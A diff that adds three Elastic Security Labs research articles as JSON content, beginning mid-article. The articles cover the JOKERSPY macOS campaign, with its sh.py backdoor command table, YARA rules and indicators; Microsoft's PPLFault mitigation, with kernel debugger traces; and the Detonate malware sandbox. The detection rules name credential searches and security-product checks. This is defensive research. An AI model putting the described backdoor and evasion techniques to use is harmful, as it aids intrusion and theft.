for file and keychain Data Protection are stored in [keybags](https://support.apple.com/en-au/guide/security/sec6483d5760/web), and pertain to iOS, iPadOS, watchOS, and tvOS. 
At this time, researchers propose that this staging serves a defense evasion purpose and speculate that these libraries may contain useful vulnerabilities. The threat actor may plan to introduce these vulnerabilities to otherwise patched systems or applications.\n\n#### The sh.py backdoor\n\n**sh.py** is a Python backdoor used to deploy and execute other post-exploitation capabilities like Swiftbelt.\n\nThe malware loads its configuration from **~/Public/Safari/sar.dat**. The configuration file contains crucial elements such as command-and-control (C2) URLs, a sleep timer for beaconing purposes (the default value is 5 seconds), and a unique nine-digit identifier assigned to each agent.\n\n\n\nAs part of its periodic beaconing, the malware gathers and transmits various system information. The information sent includes:\n\n- Hostname\n- Username\n- Domain name\n- Current directory\n- The absolute path of the executable binary\n- OS version\n- Is 64-bit OS\n- Is 64-bit process\n- Python version\n\nBelow is a table outlining the various commands that can be handled by the backdoor:\n\n| Command | Description |\n| ------- | ------------------------------------------------------------------------------------- |\n| sk | Stop the backdoor's execution |\n| l | List the files of the path provided as a parameter |\n| c | Execute and return the output of a shell command |\n| cd | Change directory and return the new path |\n| xs | Execute Python code given as a parameter in the current context |\n| xsi | Decode Base64-encoded Python code given as a parameter, compile it, then execute it |\n| r | Remove a file or directory from the system |\n| e | Execute a file from the system with or without parameters |\n| u | Upload a file to the infected system |\n| d | Download a file from the infected system |\n| g | Get the current malware's configuration stored in the configuration file |\n| w | Override the malware's configuration file with new values |\n\n### Swiftbelt\n\nOn June 1st, the 
compromised system registered a signature alert for [MacOS.Hacktool.Swiftbelt](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/MacOS_Hacktool_Swiftbelt.yar), a macOS enumeration capability inspired by [SeatBelt](https://github.com/GhostPack/Seatbelt) and created by the red-teamer Cedric Owens. Unlike other enumeration methods, Swiftbelt invokes Swift code to avoid creating command line artifacts. Notably, **xcc** variants are also written using Swift.\n\nThe signature alert indicated that Swiftbelt was written to **/Users/shared/sb** and executed using the bash shell interpreter, **sh**. The full command line observed by researchers was **Users/Shared/sb /bin/sh -c /users/shared/sb \\\\> /users/shared/sb.log 2\\\\>&1** , demonstrating that the threat actor captured results in **sb.log** , with errors redirected to the same file.\n\n## Diamond Model\n\nElastic Security utilizes the [Diamond Model](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf) to describe high-level relationships between the adversaries, capabilities, infrastructure, and victims of intrusions. While the Diamond Model is most commonly used with single intrusions, with Activity Threading (section 8) used to create relationships between incidents, an adversary-centered (section 7.1.4) approach allows for a single, albeit cluttered, diamond.\n\n\n\n## Observed tactics and techniques\n\n### MITRE ATT&CK Tactics\n\nTactics represent the why of a technique or sub-technique. They describe the adversary’s tactical goal: the reason for performing an action. 
These are the tactics observed by Elastic Security Labs in this campaign:\n\n- [Execution](https://attack.mitre.org/tactics/TA0002)\n- [Persistence](https://attack.mitre.org/tactics/TA0003)\n- [Privilege Escalation](https://attack.mitre.org/tactics/TA0004)\n- [Defense Evasion](https://attack.mitre.org/tactics/TA0005)\n- [Discovery](https://attack.mitre.org/tactics/TA0007)\n\n### MITRE ATT&CK Techniques / Sub-techniques\n\nTechniques and sub-techniques represent how an adversary achieves a tactical goal by performing an action. These are the techniques observed by Elastic Security Labs in this campaign:\n\n- [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)\n- [Dylib Hijacking](https://attack.mitre.org/techniques/T1574/004)\n- [Potential Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)\n- [Potential Abuse Elevation Control Mechanism](https://attack.mitre.org/techniques/T1548)\n- [Hide Artifacts](https://attack.mitre.org/techniques/T1564)\n- [Masquerading](https://attack.mitre.org/techniques/T1036)\n- [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)\n- [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553)\n- [Application Window Discovery](https://attack.mitre.org/techniques/T1010)\n- [Screen Capture](https://attack.mitre.org/techniques/T1113)\n- [Cryptoistic Software](https://attack.mitre.org/software/S0498)\n- [Data from Local System](https://attack.mitre.org/techniques/T1005)\n\n## Detection logic\n\n### YARA\n\nElastic Security has created YARA rules to identify this activity. 
Below are YARA rules to identify the JOKERSPY backdoor and SwiftBelt tool.\n\n```\nrule Macos_Hacktool_JokerSpy {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2023-06-19\"\n last_modified = \"2023-06-19\"\n os = \"MacOS\"\n arch = \"x86\"\n category_type = \"Hacktool\"\n family = \"JokerSpy\"\n threat_name = \"Macos.Hacktool.JokerSpy\"\n reference_sample = \"d895075057e491b34b0f8c0392b44e43ade425d19eaaacea6ef8c5c9bd3487d8\"\n license = \"Elastic License v2\"\n\n strings:\n $str1 = \"ScreenRecording: NO\" fullword\n $str2 = \"Accessibility: NO\" fullword\n $str3 = \"Accessibility: YES\" fullword\n $str4 = \"eck13XProtectCheck\"\n $str5 = \"Accessibility: NO\" fullword\n $str6 = \"kMDItemDisplayName = *TCC.db\" fullword\n condition:\n 5 of them\n}\n```\n\n```\nrule MacOS_Hacktool_Swiftbelt {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2021-10-12\"\n last_modified = \"2021-10-25\"\n threat_name = \"MacOS.Hacktool.Swiftbelt\"\n reference_sample = \"452c832a17436f61ad5f32ee1c97db05575160105ed1dcd0d3c6db9fb5a9aea1\"\n os = \"macos\"\n arch_context = \"x86\"\n license = \"Elastic License v2\"\n\n strings:\n $dbg1 = \"SwiftBelt/Sources/SwiftBelt\"\n $dbg2 = \"[-] Firefox places.sqlite database not found for user\"\n $dbg3 = \"[-] No security products found\"\n $dbg4 = \"SSH/AWS/gcloud Credentials Search:\"\n $dbg5 = \"[-] Could not open the Slack Cookies database\"\n $sec1 = \"[+] Malwarebytes A/V found on this host\"\n $sec2 = \"[+] Cisco AMP for endpoints found\"\n $sec3 = \"[+] SentinelOne agent running\"\n $sec4 = \"[+] Crowdstrike Falcon agent found\"\n $sec5 = \"[+] FireEye HX agent installed\"\n $sec6 = \"[+] Little snitch firewall found\"\n $sec7 = \"[+] ESET A/V installed\"\n $sec8 = \"[+] Carbon Black OSX Sensor installed\"\n $sec9 = \"/Library/Little Snitch\"\n $sec10 = \"/Library/FireEye/xagt\"\n $sec11 = \"/Library/CS/falcond\"\n $sec12 = \"/Library/Logs/PaloAltoNetworks/GlobalProtect\"\n $sec13 = \"/Library/Application 
Support/Malwarebytes\"\n $sec14 = \"/usr/local/bin/osqueryi\"\n $sec15 = \"/Library/Sophos Anti-Virus\"\n $sec16 = \"/Library/Objective-See/Lulu\"\n $sec17 = \"com.eset.remoteadministrator.agent\"\n $sec18 = \"/Applications/CarbonBlack/CbOsxSensorService\"\n $sec19 = \"/Applications/BlockBlock Helper.app\"\n $sec20 = \"/Applications/KextViewr.app\"\n condition:\n 6 of them\n}\n```\n\n## References\n\nThe following were referenced throughout the above research:\n\n- [https://www.bitdefender.com/blog/labs/fragments-of-cross-platform-backdoor-hint-at-larger-mac-os-attack](https://www.bitdefender.com/blog/labs/fragments-of-cross-platform-backdoor-hint-at-larger-mac-os-attack/)\n\n## Observations\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n| ---------------------------------------------------------------- | ------- | ------------------- | ------------------------ |\n| app.influmarket[.]org | Domain | n/a | sh.py domain |\n| d895075057e491b34b0f8c0392b44e43ade425d19eaaacea6ef8c5c9bd3487d8 | SHA-256 | /Users/Shared/xcc | Macos.Hacktool.JokerSpy |\n| 8ca86f78f0c73a46f31be366538423ea0ec58089f3880e041543d08ce11fa626 | SHA-256 | /Users/Shared/sb | MacOS.Hacktool.Swiftbelt |\n| aa951c053baf011d08f3a60a10c1d09bbac32f332413db5b38b8737558a08dc1 | SHA-256 | /Users/Shared/sh.py | sh.py script |\n"
+ },
+ "title": "Initial research exposing JOKERSPY",
+ "slug": "inital-research-of-jokerspy",
+ "subtitle": "An overview of JOKERSPY, discovered in June 2023, which deployed custom and open source macOS tools to exploit a cryptocurrency exchange located in Japan.",
+ "date": "2023-06-21",
+ "description": "Explore JOKERSPY, a recently discovered campaign that targets financial institutions with Python backdoors. This article covers reconnaissance, attack patterns, and methods of identifying JOKERSPY in your network.",
+ "author": [
+ {
+ "slug": "colson-wilhoit"
+ },
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "andrew-pease"
+ },
+ {
+ "slug": "ricardo-ungureanu"
+ }
+ ],
+ "image": "photo-edited-04@2x.jpg",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ },
+ {
+ "slug": "campaigns"
+ }
+ ],
+ "tags": [
+ "ref9134",
+ "jokerspy",
+ "cryptocurrency",
+ "defi",
+ "swiftbelt"
+ ]
+ },
+ "id": "security_labs_content-inital_research_of_jokerspy-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-inside_microsofts_plan_to_kill_pplfault-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-inside_microsofts_plan_to_kill_pplfault-md.json
new file mode 100644
index 00000000000..83a1197b3cc
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-inside_microsofts_plan_to_kill_pplfault-md.json
@@ -0,0 +1,28 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Inside Microsoft's plan to kill PPLFault\"\nslug: \"inside-microsofts-plan-to-kill-pplfault\"\ndate: \"2023-09-15\"\ndescription: \"In this research publication, we'll learn about upcoming improvements to the Windows Code Integrity subsystem that will make it harder for malware to tamper with Anti-Malware processes and other important security features.\"\nauthor:\n - slug: gabriel-landau\nimage: \"photo-edited-04@2x.jpg\"\ncategory:\n - slug: security-research\ntags:\n - security-research\n - detection-science\n---\n\nOn September 1, 2023, Microsoft released a new build of Windows Insider Canary, version 25941. Insider builds are pre-release versions of Windows that include experimental features that may or may not ever reach General Availability (GA). Build 25941 includes improvements to the Code Integrity (CI) subsystem that mitigate a long-standing issue that enables attackers to load unsigned code into Protected Process Light (PPL) processes.\n\nThe PPL mechanism was introduced in Windows 8.1, enabling specially-signed programs to run in such a way that they are protected from tampering and termination, even by administrative processes. The goal was to keep malware from running amok — tampering with critical system processes and terminating anti-malware applications. There is a hierarchy of PPL “levels,” with higher-privilege ones immune from tampering by lower-privilege ones, but not vice-versa. Most PPL processes are managed by Microsoft but members of the [Microsoft Virus Initiative](https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/virus-initiative-criteria?view=o365-worldwide) are allowed to run their products at the [less-trusted Anti-Malware PPL level](https://learn.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-).\n\n\n\nA few core Windows components run at the highest level of PPL, called Windows Trusted Computing Base (**WinTcb-Light**). 
Because of the protection afforded to these components and their narrow scope of function, they are considered more trusted than most user mode code. Most of these processes (such as **csrss.exe**) and their complex kernel-mode counterparts (such as **win32k.sys**) were written decades ago under different assumptions when the kernel-user boundary was even weaker than it is today. Rather than rewrite all these components, Microsoft made these user mode processes **WinTcb-Light**, mitigating tampering and injection attacks. [Alex Ionescu](https://twitter.com/aionescu) stated it clearly in 2013:\n\n>Because the Win32k.sys developers did not expect local code injection attacks to be an issue (they require Administrator rights, after all), many of these APIs didn’t even have SEH, or had other assumptions and bugs. Perhaps most famously, one of these, [discovered by j00ru](http://j00ru.vexillium.org/?p=1393), and still unpatched, has been used as the sole basis of the Windows 8 RT jailbreak. In [Windows 8.1 RT](http://forum.xda-developers.com/showthread.php?t=2092158), this jailbreak is “fixed”, by virtue that code can no longer be injected into Csrss.exe for the attack. [Similar](http://j00ru.vexillium.org/?p=1455) Win32k.sys exploits that relied on Csrss.exe are also mitigated in this fashion.\n\nTo reduce the attack surface, Microsoft runs most of their PPL code with less privilege than **WinTcb-Light**:\n\n\n\nMicrosoft does not consider PPL to be a [security boundary](https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria), meaning they won’t prioritize security patches for code-execution vulnerabilities discovered therein, but they have historically [addressed](https://itm4n.github.io/the-end-of-ppldump/) some such [vulnerabilities](https://x.com/GabrielLandau/status/1683854578767343619?s=20) on a less-urgent basis.\n\n### Loading code into PPL processes\n\nTo load code into a PPL process, it must be signed by special certificates. 
This applies to both executables (process creation) and libraries (DLL loads). For the sake of simplicity, we’ll focus on DLL loading, but the CI validation process is very similar for both. This article is focused on PPL, so we will not discuss kernel mode code integrity.\n\n[Portable Executable](https://learn.microsoft.com/en-us/windows/win32/debug/pe-format) (PE) files come in many extensions, including EXE, DLL, SYS, OCX, CPL, and SCR. While the extension may vary, they’re all quite similar at a binary level. For a PPL process to load and execute a DLL, a few steps must be taken. Note that these steps are simplified, but should be sufficient for this article:\n\n 1. An application calls **[LoadLibrary](https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryw)**, passing the path to the DLL to be loaded.\n 2. **LoadLibrary** calls into the loader within NTDLL (e.g. **ntdll!LdrLoadDll**), which opens a handle to the file using an API such as **NtCreateFile**.\n 3. The loader then passes this file handle to **[NtCreateSection](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntcreatesection)**, asking the kernel memory manager to create a [section object](https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/section-objects-and-views) which describes how the file is to be mapped into memory. A section object is also known as a [file mapping object](https://learn.microsoft.com/en-us/windows/win32/memory/file-mapping) in higher abstraction layers (such as Win32), but since we’re focused on the kernel, we’ll keep calling them section objects. The Windows loader always uses a specific type of section called an [executable image](https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/executable-images) (aka [SEC_IMAGE](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createfilemappinga)), which can only be created from PE files.\n 4. 
Before returning the section object to user mode, the memory manager checks the digital signature on the file to ensure it meets the requirements for the given level of PPL. The internal memory manager function **MiValidateSectionCreate** relies on the Code Integrity module **ci.dll** to handle the requisite cryptography and [PKI](https://en.wikipedia.org/wiki/Public_key_infrastructure) policy.\n 5. The memory manager restructures the PE so that it can be mapped into memory and executed. This step involves creating multiple subsections, one for each of the different portions of the PE file that must be mapped differently. For example, global variables may be read-write, whereas the code may be execute-read. To achieve this granularity, the resulting regions of memory must have distinct [page table entries](https://en.wikipedia.org/wiki/Page_table) with different page permissions. Other changes may be applied here, such as applying relocations, but they are out of scope for this research publication.\n 6. The kernel returns the new section handle to the loader in NTDLL.\n 7. The NTDLL loader then asks the kernel memory manager to map a [view of the section](https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/section-objects-and-views) into the process address space via the **[NtMapViewOfSection](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-zwmapviewofsection)** syscall. The memory manager complies.\n 8. Once the view is mapped, the loader finishes the processing required to create a functional DLL in memory. 
The details of this are out of scope.\n\n### Page hashes\n\nIn the above steps, we can see that a PE’s digital signature is validated during section creation, but there is another way that code can be loaded into the address space of a PPL process - [paging](https://en.wikipedia.org/wiki/Memory_paging).\n\nUnmodified pages belonging to file-backed sections (including **SEC_IMAGE**) can be quickly discarded whenever the system is low on memory because there’s a copy of that exact data on disk. If the page is later touched, the CPU will issue a page fault, and the memory manager’s page fault handler will re-read that data from disk. Because **SEC_IMAGE** sections can only be created from immutable file data, and the signature has already been verified, the data is considered trusted.\n\nPE files may be optionally built with the [**/INTEGRITYCHECK**](https://learn.microsoft.com/en-us/cpp/build/reference/integritycheck-require-signature-check?view=msvc-170) flag. This sets a flag in the PE header that, among other things, instructs the memory manager to create and store hashes of every page (aka “page hashes”) of that PE as sections are created from it. After reading a page from disk, the page fault handler calls **MiValidateInPage** to verify that the page hash hasn’t changed since the signature was initially verified. If the page hash has changed, the handler will raise an exception. This feature is useful for detecting [bit rot](https://en.wikipedia.org/wiki/Data_degradation) in the page file and a few types of attacks. 
Beyond **/INTEGRITYCHECK** images, page hashes are [also enabled](https://twitter.com/DavidLinsley11/status/1190810926762450944) for all modules loaded into full Protected Processes (not PPL), and drivers loaded into the kernel.\n\n_**Note:** It is possible to create a **SEC_IMAGE** section from a file with [user-writable references](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-mmdoesfilehaveuserwritablereferences), a tactic employed by techniques like [Process Herpaderping](https://jxy-s.github.io/herpaderping/). The existence of user-writable references means that a file could be modified after the image section is created. When a program attempts to use such a mutable file, the memory manager first copies the file’s contents to the page file, creating an immutable backing for the image section to prevent tampering. In this case, the section will not be backed by the original file, but instead by the page file. See [this Microsoft article](https://www.microsoft.com/en-us/security/blog/2022/06/30/using-process-creation-properties-to-catch-evasion-techniques/) for more information about user-writable references._\n\n### Exploitation\n\nIn September 2022, Gabriel Landau from Elastic Security filed VULN-074311 with MSRC, notifying them of two [zero-day](https://www.trendmicro.com/vinfo/us/security/definition/zero-day-vulnerability) vulnerabilities in Windows: one admin-to-PPL and one PPL-to-kernel. Two exploits for these vulnerabilities were provided named [PPLFault](https://github.com/gabriellandau/PPLFault) and [GodFault](https://github.com/gabriellandau/PPLFault#godfault), respectively, along with their source code. 
These exploits allow malware to [bypass LSA protection](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection), terminate or blind EDR software, and modify kernel memory to tamper with core OS behavior - all without the use of any vulnerable drivers. See [this article](https://www.elastic.co/security-labs/forget-vulnerable-drivers-admin-is-all-you-need) for more details on their impact.\n\nThe admin-to-PPL exploit PPLFault leverages the fact that page hashes are not validated for PPL and employs the [Cloud Filter API](https://learn.microsoft.com/en-us/windows/win32/api/_cloudapi/) to violate immutability assumptions of files backing **SEC_IMAGE** sections. PPLFault uses paging to inject code into a DLL loaded within a PPL process running as **WinTcb-Light**, the most privileged form of PPL. The PPL-to-kernel exploit GodFault first uses PPLFault to get **WinTcb-Light** code execution, then exploits the kernel’s trust of **WinTcb-Light** processes to modify kernel memory, granting itself full read-write access to physical memory.\n\nThough MSRC [declined](https://www.elastic.co/security-labs/forget-vulnerable-drivers-admin-is-all-you-need) to take any action on these vulnerabilities, the Windows Defender team has [shown interest](https://twitter.com/PhilipTsukerman/status/1683861340207607813?s=20). PPLFault and GodFault were released at [Black Hat Asia](https://www.blackhat.com/asia-23/briefings/schedule/#ppldump-is-dead-long-live-ppldump-31052) in May 2023 alongside a mitigation to stop these exploits called [NoFault](https://github.com/gabriellandau/PPLFault/tree/main/NoFault).\n\n### Mitigation\nOn September 1, 2023, Microsoft released build 25941 of Windows Insider Canary. This build adds a new check to the memory manager function **MiValidateSectionCreate** which enables page hashes for all images that reside on remote devices. 
Comparing 25941 against its predecessor 25936, we can see the following two new basic blocks:\n\n\n\nDecompiled into C, the new code looks like this:\n\n\n\nWhen PPLFault is run, Windows Error Reporting generates an event log indicating a failure during a paging operation:\n\n\n\nPPLFault requires its payload DLL to be loaded over the SMB network redirector to achieve the desired paging behavior. By forcing the use of page hashes for such network-hosted DLLs, the exploit can no longer inject its payload, so the vulnerability is fixed. The aforementioned [NoFault](https://github.com/gabriellandau/PPLFault/tree/main/NoFault) mitigation released at Black Hat also targets network redirectors, blocking such DLL loads into PPL entirely. Elastic Defend 8.9.0 and later block PPLFault - please update if you haven’t already.\n\nTracking down the exact point of failure in a kernel debugger, we can see the page fault handler invoking CI to validate page hashes, which fails with **STATUS_INVALID_IMAGE_HASH (0xC0000428)**. 
This is later converted to **STATUS_IN_PAGE_ERROR (0xC0000006)**.\n\n```\n0: kd> g\nBreakpoint 1 hit\nCI!CiValidateImagePages+0x360:\n0010:fffff805`725028b4 b8280400c0 mov eax,0C0000428h\n7: kd> k\n # Child-SP RetAddr Call Site\n00 fffff508`1b4a6dc0 fffff805`72502487 CI!CiValidateImagePages+0x360\n01 fffff508`1b4a6f90 fffff805`6f2f1bbd CI!CiValidateImageData+0x27\n02 fffff508`1b4a6fd0 fffff805`6ee35de5 nt!SeValidateImageData+0x2d\n03 fffff508`1b4a7020 fffff805`6efa167b nt!MiValidateInPage+0x305\n04 fffff508`1b4a70d0 fffff805`6ef9fffe nt!MiWaitForInPageComplete+0x31b\n05 fffff508`1b4a71d0 fffff805`6ef68692 nt!MiIssueHardFault+0x3fe\n06 fffff508`1b4a72e0 fffff805`6f0a784b nt!MmAccessFault+0x3b2\n07 fffff508`1b4a7460 00007fff`ccf71500 nt!KiPageFault+0x38b\n08 000000b6`776bf1b8 00007fff`d5500ac0 0x00007fff`ccf71500\n09 000000b6`776bf1c0 00000000`00000000 0x00007fff`d5500ac0\n7: kd> !error C0000428\nError code: (NTSTATUS) 0xc0000428 (3221226536) - Windows cannot verify the \n digital signature for this file. A recent hardware or software change \n might have installed a file that is signed incorrectly or damaged, or \n that might be malicious software from an unknown source.\n```\n\n### Comparing behavior\n\nWith the fix introduced in build 25941, the final vulnerable build is 25936. 
Running PPLFault in both builds under a kernel debugger, we can use the following WinDbg command to see the files for which CI is computing page hashes:\n\n```\nbp /w \"&CI!CipValidatePageHash == @rcx\" CI!CipValidateImageHash \n \"dt _FILE_OBJECT @r8 FileName; g\"\n```\n\nThis command generates the following WinDbg output for build 25936, before the fix:\n\n\n\nHere is the WinDbg output for build 25941, which includes the fix:\n\n\n\n### Conclusion\n\nDespite taking [longer than it perhaps should](https://www.elastic.co/security-labs/forget-vulnerable-drivers-admin-is-all-you-need), it's exciting to see Microsoft taking steps to defend PPL processes (including Anti-Malware) from malware running as admin, and users will benefit if this improvement reaches GA soon. Many features in Insider, even security features, are not available in (and may never reach) GA. Microsoft is very conservative when it comes to changes with potential stability, compatibility, or performance risk; memory manager changes are among the riskier types. For example, the PreviousMode kernel exploit mitigation [spotted in Insider last November](https://twitter.com/GabrielLandau/status/1597001955909697536?s=20) still hasn’t reached GA, even after _at least_ 10 months.\n\n_Special thanks to [Grzegorz Tworek](https://twitter.com/0gtweet) for his help reverse engineering some kernel functions._"
+ },
+ "title": "Inside Microsoft's plan to kill PPLFault",
+ "slug": "inside-microsofts-plan-to-kill-pplfault",
+ "date": "2023-09-15",
+ "description": "In this research publication, we'll learn about upcoming improvements to the Windows Code Integrity subsystem that will make it harder for malware to tamper with Anti-Malware processes and other important security features.",
+ "author": [
+ {
+ "slug": "gabriel-landau"
+ }
+ ],
+ "image": "photo-edited-04@2x.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ],
+ "tags": [
+ "security-research",
+ "detection-science"
+ ]
+ },
+ "id": "security_labs_content-inside_microsofts_plan_to_kill_pplfault-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-into_the_weeds_how_we_run_detonate-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-into_the_weeds_how_we_run_detonate-md.json
new file mode 100644
index 00000000000..a65af658fae
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-into_the_weeds_how_we_run_detonate-md.json
@@ -0,0 +1,40 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Into The Weeds: How We Run Detonate\"\nslug: \"into-the-weeds-how-we-run-detonate\"\ndate: \"2023-06-13\"\nsubtitle: \"A deeper dive into the technical implementations of Detonate\"\ndescription: \"Explore the technical implementation of the Detonate system, including sandbox creation, the supporting technology, telemetry collection, and how to blow stuff up.\"\nauthor:\n - slug: jessica-david\n - slug: sergey-polzunov\n - slug: hez-carty\nimage: \"photo-edited-02@2x.jpg\"\ncategory:\n - slug: detection-science\n - slug: tools\n - slug: security-research\ntags:\n - detonate\n---\n\n## Preamble\n\nIn our [first post](https://www.elastic.co/security-labs/click-click-boom-automating-protections-testing-with-detonate) in our Detonate series, we introduced the Detonate system and what we use it for at Elastic. We also discussed the benefits it provides our team when assessing the performance of our security artifacts.\n\nIn this publication, we will break down how Detonate works & dive deeper into the technical implementation. This includes how we’re able to create this sandboxed environment in practice, the technology that supports the overall pipeline, and how we submit information to and read information from the pipeline.\n\n> Interested in other posts on Detonate? Check out [Part 1 - Click, Click…Boom!](https://www.elastic.co/security-labs/click-click-boom-automating-protections-testing-with-detonate) where we introduce Detonate, why we built it, explore how Detonate works, describe case studies, and discuss efficacy testing.\n\n## Architecture\n\nBelow is a high-level overview of the Detonate end-to-end architecture.\n\n\n\nThe overall system consists of a series of message queues and Python workers. Detonation tasks are created by an API server upon accepting a request with as little information as the sample file hash. The task then moves from queue to queue, picked up by workers that execute various operations along the way. 
\nThe server and workers run in a container on [Amazon ECS](https://aws.amazon.com/ecs/). The pipeline can also be brought up locally using [Docker Compose](https://docs.docker.com/compose/) for early development and feature testing.\n\n### API server\n\nThe Detonate API server is a [FastAPI](https://fastapi.tiangolo.com/) Python application that accepts a variety of execution target requests: hashes of samples, native commands (in bash or PowerShell, with or without arguments), and uploaded files. The server also exposes endpoints for fetching alerts and raw agent telemetry from an Elastic cluster.\n\nThe API documentation is generated [automatically](https://fastapi.tiangolo.com/advanced/extending-openapi/) by FastAPI and incorporated into our global API schema.\n\n\n\n#### Interacting with the API server - CLI\n\nWe built a custom Python CLI (command-line interface) tool for interacting with our Detonate server. The CLI tool is built using the Python library [click](https://click.palletsprojects.com/en/8.1.x/) along with [rich](https://github.com/Textualize/rich) for a beautiful formatting experience in a terminal window. The tool is particularly useful for debugging the pipeline, as it can also be run against a local pipeline setup. The tool is installed and runs using [Poetry](https://python-poetry.org/), our tool of choice for managing dependencies and running scripts.\n\n```\n❯ DETONATE_CLI_API_ROOT_URL=\"${API_ENDPOINT_URL}\" \\\n\tDETONATE_CLI_API_AUTH_HEADER=\"${API_KEY}\" \\\n\tpoetry run cli \\\n\t--hash \"${MY_FILE_HASH}\"\n```\n\n\n\n\n\n#### Interacting with the API server - Web UI\n\nInternally, we host a site called Protections Portal (written using [Elastic UI](https://elastic.github.io/eui/) components) to assist our team with research. For a more interactive experience with the Detonate API, we built a page in the Portal to interact with it. 
Along with submitting tasks, the Web UI allows users to see the feed of all detonations and the details of each task.\n\n\n\nEach task can be expanded to see its full details. We provide the links to the data and telemetry collected during the detonation.\n\n\n\n#### Interacting with the API server - HTTP client\n\nIf our users want to customize how they interact with the Detonate API, they can also run commands using their HTTP client of choice (such as **curl**, **httpie**, etc.). This allows them to add detonations to scripts or as final steps at the end of their own workflows.\n\n### Queues\n\nThe pipeline is built on a series of queues and workers. Having very basic requirements for the message queue engine, we decided to go with [Amazon SQS](https://aws.amazon.com/sqs/). One of the many benefits of using a popular service like SQS is the availability of open-source resources and libraries we can build upon. For example, we use [softwaremill/elasticmq](https://github.com/softwaremill/elasticmq) Docker images as a queue engine when running the pipeline locally.\n\nThe queues are configured and deployed with Terraform code that covers all our production and staging infrastructure.\n\n### Workers\n\nEach worker is a Python script that acts as both a queue consumer and a queue producer. The workers are implemented in our custom mini-framework, with the boilerplate code for error handling, retries, and monitoring built-in. Our base worker is easily extended, allowing us to add new workers and evolve existing ones if additional requirements arise.\n\nFor monitoring, we use the [Elastic APM](https://www.elastic.co/observability/application-performance-monitoring) observability solution. It is incredibly powerful, giving us a view into the execution flow and making debugging pipeline issues a breeze. 
Below, we can see a Detonate task move between workers in the APM UI:\n\n\n\nThese software and infrastructure components give us everything we need to perform the submission, execution, and data collection that make up a detonation.\n\n## Detonations\n\n\n\nThe pipeline can execute commands and samples in Windows, Linux, and macOS virtual machines (VMs). For Windows and Linux environments, we use VM instances in [Google Compute Engine](https://cloud.google.com/compute). Its wide selection of public images allows us to provision sandboxed environments with different versions of Windows, Debian, Ubuntu, CentOS, and RHEL.\n\nFor macOS environments, we use [mac1.metal instances in AWS](https://aws.amazon.com/ec2/instance-types/mac/) and an on-demand macOS VM provisioning [solution from Veertu called Anka](https://veertu.com/anka-build/). Anka gives us the ability to quickly rotate multiple macOS VMs running on the same macOS bare metal instance.\n\nDetonate is currently focused on the breadth of our OS coverage, scalability, and the collection of contextually relevant data from the pipeline. Fitting sophisticated anti-analysis countermeasures into Detonate is currently being researched and engineered.\n\n### VM provisioning\n\nIn order to keep our footprint in the VM to a minimum, we use startup scripts for provisioning. Minimizing our footprint is important because our activities within a VM are included in the events we collect, making analysis more complicated after a run. For Windows and Linux VMs, [GCP startup scripts](https://cloud.google.com/compute/docs/instances/startup-scripts) written in PowerShell and bash are used to configure the system; for macOS VMs, we wrote custom bash and AppleScript scripts.\n\nThe startup scripts perform these steps:\n\n- **Configure the system**. For example, disable MS Defender, enable macro execution in MS Office, disable automatic system updates, etc.\n- **Download and install Elastic agent**. 
The script verifies that the agent is properly [enrolled into the Fleet Server](https://www.elastic.co/guide/en/fleet/current/fleet-overview.html) and that the policies are applied.\n- **Download and detonate a sample, or execute a set of commands**. The execution happens in a background process, while the main script collects the STDOUT / STDERR datastreams and sleeps for N seconds.\n- **Collect files from the filesystem (if needed) and upload them into the storage**. This allows us to do any additional verification or debugging once the detonation is complete.\n\nThe VM lifecycle is managed by the **start_vm** and **stop_vm** workers. Since we expect some detonations to break the startup script execution flow (e.g., in the case of ransomware), every VM has a TTL set, which allows the **stop_vm** worker to delete VMs not in use anymore.\n\nThis clean-slate approach, with the startup script used to configure everything needed for a detonation, allows us to use VM images from the vendors from Google Cloud public images catalog without any modifications!\n\n### Network configuration\n\nSome of the samples we detonate are malicious and might produce malicious traffic, such as network scans, C2 callouts, etc. In order to keep our cloud resources and our vendor’s infrastructure safe, we limit all outgoing traffic from VMs. The instances are placed in a locked-down VPC that allows outgoing connection only to a predefined list of targets. We restrict traffic flows in VPC using Google Cloud’s [routes](https://cloud.google.com/vpc/docs/routes) and [firewall rules](https://cloud.google.com/firewall/docs/firewalls), and AWS’s [security groups](https://docs.aws.amazon.com/vpc/latest/userguide/security-groups.html).\n\nWe also make use of [VPC Flow Logs](https://cloud.google.com/vpc/docs/flow-logs) in GCE. 
